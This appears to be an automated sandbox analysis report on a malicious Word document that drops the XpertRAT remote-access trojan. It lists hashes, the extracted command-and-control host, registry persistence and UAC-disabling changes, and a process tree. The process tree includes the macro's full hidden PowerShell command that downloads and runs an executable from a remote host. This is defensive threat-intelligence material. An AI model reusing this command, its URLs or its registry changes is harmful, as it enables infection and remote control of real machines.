Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
30-09-2021 08:53
Static task
static1
Behavioral task
behavioral1
Sample
Inq PO-000202120741.doc
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
Inq PO-000202120741.doc
Resource
win10-en-20210920
General
-
Target
Inq PO-000202120741.doc
-
Size
535KB
-
MD5
4ef6b1fa16f352e1969080579b832ee3
-
SHA1
d4b85b188ad50ef69c1a238b979a1db7f0d4970d
-
SHA256
29327d8089389d96e7ae1abcbd7c300ab587c59fa5841b748ef47e279d0c526b
-
SHA512
85bb5bde53e6df3b759377ec1920a01281ca0f36bd477335759fdb5b043575628e7be11a960c0ff04188c2a17d4c51b9c43a6efeaf21b505a48c65311af026a3
Malware Config
Extracted
httP://avira.ydns.eu/EXCEL.exe
Extracted
xpertrat
3.0.10
Test
kapasky-antivirus.firewall-gateway.net:4000
L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exepowershell.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 268 1376 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1764 1376 powershell.exe WINWORD.EXE Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1760 1376 powershell.exe WINWORD.EXE -
XpertRAT Core Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1200-137-0x0000000000400000-0x0000000000443000-memory.dmp xpertrat behavioral1/memory/1200-138-0x0000000000401364-mapping.dmp xpertrat -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" iexplore.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 268 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
EXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exepid process 428 EXCEL.exe 468 EXCEL.exe 1228 EXCEL.exe 1868 EXCEL.exe 1524 EXCEL.exe 1156 EXCEL.exe -
Loads dropped DLL 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exepid process 268 powershell.exe 1764 powershell.exe 1760 powershell.exe 428 EXCEL.exe 1228 EXCEL.exe 468 EXCEL.exe -
Processes:
EXCEL.exeEXCEL.exeEXCEL.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" EXCEL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" EXCEL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UACDisableNotify = "0" EXCEL.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
iexplore.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0 = "C:\\Users\\Admin\\AppData\\Roaming\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0.exe" iexplore.exe -
Processes:
EXCEL.exeEXCEL.exeEXCEL.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
EXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exedescription pid process target process PID 428 set thread context of 1868 428 EXCEL.exe EXCEL.exe PID 1868 set thread context of 1200 1868 EXCEL.exe iexplore.exe PID 1228 set thread context of 1524 1228 EXCEL.exe EXCEL.exe PID 468 set thread context of 1156 468 EXCEL.exe EXCEL.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1376 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exeEXCEL.exeEXCEL.exepid process 268 powershell.exe 268 powershell.exe 268 powershell.exe 1444 powershell.exe 540 powershell.exe 1760 powershell.exe 1764 powershell.exe 1764 powershell.exe 1764 powershell.exe 1760 powershell.exe 1760 powershell.exe 1432 powershell.exe 1324 powershell.exe 1164 powershell.exe 1000 powershell.exe 428 EXCEL.exe 428 EXCEL.exe 1868 EXCEL.exe 1868 EXCEL.exe 1868 EXCEL.exe 1868 EXCEL.exe 1228 EXCEL.exe 1228 EXCEL.exe 468 EXCEL.exe 468 EXCEL.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
powershell.exeEXCEL.exepowershell.exepowershell.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exepowershell.exepowershell.exepowershell.exepowershell.exeiexplore.exedescription pid process Token: SeDebugPrivilege 268 powershell.exe Token: SeDebugPrivilege 428 EXCEL.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 540 powershell.exe Token: SeDebugPrivilege 1760 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 468 EXCEL.exe Token: SeDebugPrivilege 1228 EXCEL.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeDebugPrivilege 1000 powershell.exe Token: SeDebugPrivilege 1200 iexplore.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEEXCEL.exeiexplore.exeEXCEL.exeEXCEL.exepid process 1376 WINWORD.EXE 1376 WINWORD.EXE 1376 WINWORD.EXE 1376 WINWORD.EXE 1868 EXCEL.exe 1200 iexplore.exe 1524 EXCEL.exe 1156 EXCEL.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WINWORD.EXEpowershell.exeEXCEL.exepowershell.exepowershell.exeEXCEL.exeEXCEL.exedescription pid process target process PID 1376 wrote to memory of 268 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 268 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 268 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 268 1376 WINWORD.EXE powershell.exe PID 268 wrote to memory of 428 268 powershell.exe EXCEL.exe PID 268 wrote to memory of 428 268 powershell.exe EXCEL.exe PID 268 wrote to memory of 428 268 powershell.exe EXCEL.exe PID 268 wrote to memory of 428 268 powershell.exe EXCEL.exe PID 268 wrote to memory of 428 268 powershell.exe EXCEL.exe PID 268 wrote to memory of 428 268 powershell.exe EXCEL.exe PID 268 wrote to memory of 428 268 powershell.exe EXCEL.exe PID 428 wrote to memory of 1444 428 EXCEL.exe powershell.exe PID 428 wrote to memory of 1444 428 EXCEL.exe powershell.exe PID 428 wrote to memory of 1444 428 EXCEL.exe powershell.exe PID 428 wrote to memory of 1444 428 EXCEL.exe powershell.exe PID 428 wrote to memory of 540 428 EXCEL.exe powershell.exe PID 428 wrote to memory of 540 428 EXCEL.exe powershell.exe PID 428 wrote to memory of 540 428 EXCEL.exe powershell.exe PID 428 wrote to memory of 540 428 EXCEL.exe powershell.exe PID 1376 wrote to memory of 1764 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 1764 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 1764 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 1764 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 1760 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 1760 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 1760 1376 WINWORD.EXE powershell.exe PID 1376 wrote to memory of 1760 1376 WINWORD.EXE powershell.exe PID 1764 wrote to memory of 468 1764 powershell.exe EXCEL.exe PID 1764 wrote to memory of 468 1764 powershell.exe EXCEL.exe PID 1764 wrote to memory of 468 1764 powershell.exe EXCEL.exe PID 1764 wrote to memory of 468 1764 powershell.exe EXCEL.exe PID 1764 wrote to memory of 468 1764 powershell.exe EXCEL.exe PID 1764 wrote to memory of 468 1764 powershell.exe EXCEL.exe PID 1764 wrote to memory of 468 1764 powershell.exe EXCEL.exe PID 1760 wrote to memory of 1228 1760 powershell.exe EXCEL.exe PID 1760 wrote to memory of 1228 1760 powershell.exe EXCEL.exe PID 1760 wrote to memory of 1228 1760 powershell.exe EXCEL.exe PID 1760 wrote to memory of 1228 1760 powershell.exe EXCEL.exe PID 1760 wrote to memory of 1228 1760 powershell.exe EXCEL.exe PID 1760 wrote to memory of 1228 1760 powershell.exe EXCEL.exe PID 1760 wrote to memory of 1228 1760 powershell.exe EXCEL.exe PID 468 wrote to memory of 1432 468 EXCEL.exe powershell.exe PID 468 wrote to memory of 1432 468 EXCEL.exe powershell.exe PID 468 wrote to memory of 1432 468 EXCEL.exe powershell.exe PID 468 wrote to memory of 1432 468 EXCEL.exe powershell.exe PID 1228 wrote to memory of 1324 1228 EXCEL.exe powershell.exe PID 1228 wrote to memory of 1324 1228 EXCEL.exe powershell.exe PID 1228 wrote to memory of 1324 1228 EXCEL.exe powershell.exe PID 1228 wrote to memory of 1324 1228 EXCEL.exe powershell.exe PID 468 wrote to memory of 1164 468 EXCEL.exe powershell.exe PID 468 wrote to memory of 1164 468 EXCEL.exe powershell.exe PID 468 wrote to memory of 1164 468 EXCEL.exe powershell.exe PID 468 wrote to memory of 1164 468 EXCEL.exe powershell.exe PID 1228 wrote to memory of 1000 1228 EXCEL.exe powershell.exe PID 1228 wrote to memory of 1000 1228 EXCEL.exe powershell.exe PID 1228 wrote to memory of 1000 1228 EXCEL.exe powershell.exe PID 1228 wrote to memory of 1000 1228 EXCEL.exe powershell.exe PID 428 wrote to memory of 1868 428 EXCEL.exe EXCEL.exe PID 428 wrote to memory of 1868 428 EXCEL.exe EXCEL.exe PID 428 wrote to memory of 1868 428 EXCEL.exe EXCEL.exe PID 428 wrote to memory of 1868 428 EXCEL.exe EXCEL.exe PID 428 wrote to memory of 1868 428 EXCEL.exe EXCEL.exe PID 428 wrote to memory of 1868 428 EXCEL.exe EXCEL.exe PID 428 wrote to memory of 1868 428 EXCEL.exe EXCEL.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
EXCEL.exeEXCEL.exeEXCEL.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EXCEL.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Inq PO-000202120741.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Users\Admin\AppData\Roaming\EXCEL.exe"C:\Users\Admin\AppData\Roaming\EXCEL.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute twitch.com4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
